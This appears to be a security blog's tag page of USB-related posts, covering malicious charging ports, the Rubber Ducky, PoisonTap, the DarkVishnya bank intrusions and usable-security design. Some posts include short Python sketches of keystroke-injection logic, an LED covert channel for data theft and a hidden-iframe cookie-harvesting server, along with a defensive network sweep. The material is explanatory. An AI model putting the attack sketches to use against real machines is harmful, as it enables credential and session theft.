Entries Tagged "USB"


FBI Advising People to Avoid Public Charging Stations

The FBI is warning people against using public phone-charging stations, worried that the combined power/data port can be used to inject malware onto connected devices:

Avoid using free charging stations in airports, hotels, or shopping centers. Bad actors have figured out ways to use public USB ports to introduce malware and monitoring software onto devices that access these ports. Carry your own charger and USB cord and use an electrical outlet instead.

How much of a risk is this, really? I am unconvinced, although I do carry a USB condom for charging stations I find suspicious.

News article.

Posted on April 12, 2023 at 7:11 AM

Exploding USB Sticks

In case you don’t have enough to worry about, people are hiding explosives—actual ones—in USB sticks:

In the port city of Guayaquil, journalist Lenin Artieda of the Ecuavisa private TV station received an envelope containing a pen drive which exploded when he inserted it into a computer, his employer said.

Artieda sustained slight injuries to one hand and his face, said police official Xavier Chango. No one else was hurt.

Chango said the USB drive sent to Artieda could have been loaded with RDX, a military-type explosive.

More:

According to police official Xavier Chango, the flash drive that went off had a 5-volt explosive charge and is thought to have used RDX. Also known as T4, according to the Environmental Protection Agency (PDF), militaries, including the US’s, use RDX, which “can be used alone as a base charge for detonators or mixed with other explosives, such as TNT.” Chango said it comes in capsules measuring about 1 cm, but only half of it was activated in the drive that Artieda plugged in, which likely saved him some harm.

Reminds me of assassination by cell phone.

Posted on March 24, 2023 at 7:04 AM

USB “Rubber Ducky” Attack Tool

The USB Rubber Ducky is getting better and better.

Already, previous versions of the Rubber Ducky could carry out attacks like creating a fake Windows pop-up box to harvest a user’s login credentials or causing Chrome to send all saved passwords to an attacker’s webserver. But these attacks had to be carefully crafted for specific operating systems and software versions and lacked the flexibility to work across platforms.

The newest Rubber Ducky aims to overcome these limitations. It ships with a major upgrade to the DuckyScript programming language, which is used to create the commands that the Rubber Ducky will enter into a target machine. While previous versions were mostly limited to writing keystroke sequences, DuckyScript 3.0 is a feature-rich language, letting users write functions, store variables, and use logic flow controls (i.e., if this… then that).

That means, for example, the new Ducky can run a test to see if it’s plugged into a Windows or Mac machine and conditionally execute code appropriate to each one or disable itself if it has been connected to the wrong target. It also can generate pseudorandom numbers and use them to add variable delay between keystrokes for a more human effect.
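DuckyScript 3.0 has its own syntax, but the control flow it enables is easy to picture. Here is a rough Python sketch of the logic described above; the OS check, payload strings, and delay values are all placeholder stand-ins, not anything taken from the actual tool:

    import random
    import time

    # A sketch (in Python, not actual DuckyScript) of the conditional logic
    # described above. The OS check is stubbed out: on real hardware the
    # host would be fingerprinted during USB enumeration.

    PAYLOADS = {  # hypothetical per-platform keystroke sequences
        "windows": 'powershell -c "echo demo"',
        "mac": "osascript -e 'display dialog \"demo\"'",
    }

    def detect_host_os():
        # Placeholder: pretend we fingerprinted the host machine.
        return "windows"

    def type_string(text):
        # Inject keystrokes with a pseudorandom delay between each one,
        # so the typing cadence looks more human and less like a script.
        for ch in text:
            time.sleep(random.uniform(0.03, 0.12))
            print(ch, end="", flush=True)
        print()

    host = detect_host_os()
    if host in PAYLOADS:
        type_string(PAYLOADS[host])  # run the payload matching this platform
    # else: wrong target, disable ourselves and inject nothing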

Perhaps most impressively, it can steal data from a target machine by encoding it in binary format and transmitting it through the signals meant to tell a keyboard when the CapsLock or NumLock LEDs should light up. With this method, an attacker could plug it in for a few seconds, tell someone, “Sorry, I guess that USB drive is broken,” and take it back with all their passwords saved.
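That LED trick is, in effect, a slow one-bit-at-a-time covert channel. As a simplified illustration (the USB HID plumbing and any clocking or framing are omitted), the encoding arithmetic might look like this:

    def encode_to_led_states(data):
        # Serialize each byte to 8 bits, most significant bit first:
        # 1 = LED on, 0 = LED off.
        bits = []
        for byte in data:
            for i in range(7, -1, -1):
                bits.append((byte >> i) & 1)
        return bits

    def decode_from_led_states(bits):
        # Reassemble sampled LED states back into bytes.
        out = bytearray()
        for i in range(0, len(bits) - 7, 8):
            byte = 0
            for bit in bits[i:i + 8]:
                byte = (byte << 1) | bit
            out.append(byte)
        return bytes(out)

    # The payload toggles CapsLock/NumLock to produce these states; the
    # device, posing as a keyboard, receives them as LED output reports.
    states = encode_to_led_states(b"hunter2")
    assert decode_from_led_states(states) == b"hunter2"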

Posted on August 18, 2022 at 6:45 AM

Bogus Security Technology: An Anti-5G USB Stick

The 5GBioShield sells for £339.60, and the description sounds like snake oil:

…its website, which describes it as a USB key that “provides protection for your home and family, thanks to the wearable holographic nano-layer catalyser, which can be worn or placed near to a smartphone or any other electrical, radiation or EMF [electromagnetic field] emitting device”.

“Through a process of quantum oscillation, the 5GBioShield USB key balances and re-harmonises the disturbing frequencies arising from the electric fog induced by devices, such as laptops, cordless phones, wi-fi, tablets, et cetera,” it adds.

Turns out that it’s just a regular USB stick.

Posted on May 29, 2020 at 12:02 PM

Hey Secret Service: Don't Plug Suspect USB Sticks into Random Computers

I just noticed this bit from the incredibly weird story of the Chinese woman arrested at Mar-a-Lago:

Secret Service agent Samuel Ivanovich, who interviewed Zhang on the day of her arrest, testified at the hearing. He stated that when another agent put Zhang’s thumb drive into his computer, it immediately began to install files, a “very out-of-the-ordinary” event that he had never seen happen before during this kind of analysis. The agent had to immediately stop the analysis to halt any further corruption of his computer, Ivanovich testified. The analysis is ongoing but still inconclusive, he said.

This is what passes for forensics at the Secret Service? I expect better.

EDITED TO ADD (4/9): I know this post is peripherally related to Trump. I know some readers can’t help themselves from talking about broader issues surrounding Trump, Russia, and so on. Please do not comment to those posts. I will delete them as soon as I see them.

EDITED TO ADD (4/9): Ars Technica has more detail.

Posted on April 9, 2019 at 6:54 AM

Banks Attacked through Malicious Hardware Connected to the Local Network

Kaspersky is reporting on a series of bank hacks—called DarkVishnya—perpetrated through malicious hardware being surreptitiously installed into the target network:

In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company’s local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization’s building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals’ abilities and personal preferences. In the cases we researched, it was one of three tools:

  • netbook or inexpensive laptop
  • Raspberry Pi computer
  • Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.
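One lesson for defenders is that these implants only work because nobody notices an extra device on the LAN. A minimal detection sketch, assuming the scapy library, raw-socket privileges, and a placeholder subnet and asset inventory, would ARP-sweep the network and flag anything unknown:

    # Requires scapy (pip install scapy) and privileges to send raw packets.
    from scapy.all import ARP, Ether, srp

    KNOWN_MACS = {"aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02"}  # asset inventory
    SUBNET = "192.168.1.0/24"  # placeholder

    # Broadcast an ARP who-has for every address in the subnet.
    answered, _ = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=SUBNET),
        timeout=2,
        verbose=False,
    )

    for _sent, reply in answered:
        if reply.hwsrc.lower() not in KNOWN_MACS:
            print("Unknown device: %s (%s)" % (reply.psrc, reply.hwsrc))

This only catches devices that answer ARP, of course; an inventory-based switch-port or 802.1X control is the stronger version of the same idea.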

Slashdot thread.

Posted on December 7, 2018 at 10:50 AM

Google Login Security for High-Risk Users

Google has a new login service for high-risk users. It’s good, but unforgiving.

Logging in from a desktop will require a special USB key, while accessing your data from a mobile device will similarly require a Bluetooth dongle. All non-Google services and apps will be exiled from reaching into your Gmail or Google Drive. Google’s malware scanners will use a more intensive process to quarantine and analyze incoming documents. And if you forget your password, or lose your hardware login keys, you’ll have to jump through more hoops than ever to regain access, the better to foil any intruders who would abuse that process to circumvent all of Google’s other safeguards.

It’s called Advanced Protection.

Posted on October 30, 2017 at 12:23 PM

Hacking Password-Protected Computers via the USB Port

PoisonTap is an impressive hacking tool that can compromise computers via the USB port, even when they are password-protected. What’s interesting is the chain of vulnerabilities the tool exploits. No individual vulnerability is a problem, but together they create a big problem.

Kamkar’s trick works by chaining together a long, complex series of seemingly innocuous software security oversights that only together add up to a full-blown threat. When PoisonTap—a tiny $5 Raspberry Pi microcomputer loaded with Kamkar’s code and attached to a USB adapter—is plugged into a computer’s USB port, it starts impersonating a new ethernet connection. Even if the computer is already connected to Wifi, PoisonTap is programmed to tell the victim’s computer that any IP address accessed through that connection is actually on the computer’s local network rather than the internet, fooling the machine into prioritizing its network connection to PoisonTap over that of the Wifi network.

With that interception point established, the malicious USB device waits for any request from the user’s browser for new web content; if you leave your browser open when you walk away from your machine, chances are there’s at least one tab in your browser that’s still periodically loading new bits of HTTP data like ads or news updates. When PoisonTap sees that request, it spoofs a response and feeds your browser its own payload: a page that contains a collection of iframes—a technique for invisibly loading content from one website inside another—that consist of carefully crafted versions of virtually every popular website address on the internet. (Kamkar pulled his list from web-popularity ranking service Alexa’s top one million sites.)

As it loads that long list of site addresses, PoisonTap tricks your browser into sharing any cookies it’s stored from visiting them, and writes all of that cookie data to a text file on the USB stick. Sites use cookies to check if a visitor has recently logged into the page, allowing visitors to avoid doing so repeatedly. So that list of cookies allows any hacker who walks away with the PoisonTap and its stored text file to access the user’s accounts on those sites.
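The interception step is simpler than it sounds. Here is a toy Python sketch of a server that answers any plain-HTTP request with a page of hidden iframes; the site list and port are placeholders, and, as noted below, HTTPS defeats the whole trick:

    from http.server import BaseHTTPRequestHandler, HTTPServer

    TARGET_SITES = ["http://example.com", "http://example.org"]  # placeholders

    class IframeInjector(BaseHTTPRequestHandler):
        def do_GET(self):
            # Answer every request with hidden iframes, one per target site;
            # the victim's browser attaches its stored cookies to each
            # framed request, which is what makes them harvestable.
            frames = "".join(
                '<iframe src="%s" style="display:none"></iframe>' % site
                for site in TARGET_SITES
            )
            body = ("<html><body>%s</body></html>" % frames).encode()
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    if __name__ == "__main__":
        HTTPServer(("0.0.0.0", 8080), IframeInjector).serve_forever()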

There’s more. Here’s another article with more details. Also note that HTTPS is a protection.

Yesterday, I testified about this at a joint hearing of the Subcommittee on Communications and Technology, and the Subcommittee on Commerce, Manufacturing, and Trade—both part of the Committee on Energy and Commerce of the US House of Representatives. Here’s the video; my testimony starts around 1:10:10.

The topic was the Dyn attacks and the Internet of Things. I talked about different market failures that will affect security on the Internet of Things. One of them was this problem of emergent vulnerabilities. I worry that as we continue to connect things to the Internet, we’re going to be seeing a lot of these sorts of attacks: chains of tiny vulnerabilities that combine into a massive security risk. It’ll be hard to defend against these types of attacks. If no one product or process is to blame, no one has responsibility to fix the problem. So I gave a mostly Republican audience a pro-regulation message. They were surprisingly polite and receptive.

Posted on November 17, 2016 at 8:22 AM

Security Design: Stop Trying to Fix the User

Every few years, a researcher replicates a security study by littering USB sticks around an organization’s grounds and waiting to see how many people pick them up and plug them in, causing the autorun function to install innocuous malware on their computers. These studies are great for making security professionals feel superior. The researchers get to demonstrate their security expertise and use the results as “teachable moments” for others. “If only everyone was more security aware and had more security training,” they say, “the Internet would be a much safer place.”

Enough of that. The problem isn’t the users: it’s that we’ve designed our computer systems’ security so badly that we demand the user do all of these counterintuitive things. Why can’t users choose easy-to-remember passwords? Why can’t they click on links in emails with wild abandon? Why can’t they plug a USB stick into a computer without facing a myriad of viruses? Why are we trying to fix the user instead of solving the underlying security problem?

Traditionally, we’ve thought about security and usability as a trade-off: a more secure system is less functional and more annoying, and a more capable, flexible, and powerful system is less secure. This “either/or” thinking results in systems that are neither usable nor secure.

Our industry is littered with examples. First: security warnings. Despite researchers’ good intentions, these warnings just inure people to them. I’ve read dozens of studies about how to get people to pay attention to security warnings. We can tweak their wording, highlight them in red, and jiggle them on the screen, but nothing works because users know the warnings are invariably meaningless. They don’t see “the certificate has expired; are you sure you want to go to this webpage?” They see, “I’m an annoying message preventing you from reading a webpage. Click here to get rid of me.”

Next: passwords. It makes no sense to force users to generate passwords for websites they only log in to once or twice a year. Users realize this: they store those passwords in their browsers, or they never even bother trying to remember them, using the “I forgot my password” link as a way to bypass the system completely—effectively falling back on the security of their e-mail account.

And finally: phishing links. Users are free to click around the Web until they encounter a link to a phishing website. Then everyone wants to know how to train the user not to click on suspicious links. But you can’t train users not to click on links when you’ve spent the past two decades teaching them that links are there to be clicked.

We must stop trying to fix the user to achieve security. We’ll never get there, and research toward those goals just obscures the real problems. Usable security does not mean “getting people to do what we want.” It means creating security that works, given (or despite) what people do. It means security solutions that deliver on users’ security goals without—as the 19th-century Dutch cryptographer Auguste Kerckhoffs aptly put it—“stress of mind, or knowledge of a long series of rules.”

I’ve been saying this for years. Security usability guru (and one of the guest editors of this issue) M. Angela Sasse has been saying it even longer. People—and developers—are finally starting to listen. Many security updates happen automatically so users don’t have to remember to manually update their systems. Opening a Word or Excel document inside Google Docs isolates it from the user’s system so they don’t have to worry about embedded malware. And programs can run in sandboxes that don’t compromise the entire computer. We’ve come a long way, but we have a lot further to go.

“Blame the victim” thinking is older than the Internet, of course. But that doesn’t make it right. We owe it to our users to make the Information Age a safe place for everyone—not just those with “security awareness.”

This essay previously appeared in the Sep/Oct issue of IEEE Security & Privacy.

EDITED TO ADD (10/13): Commentary.

Posted on October 3, 2016 at 6:12 AM
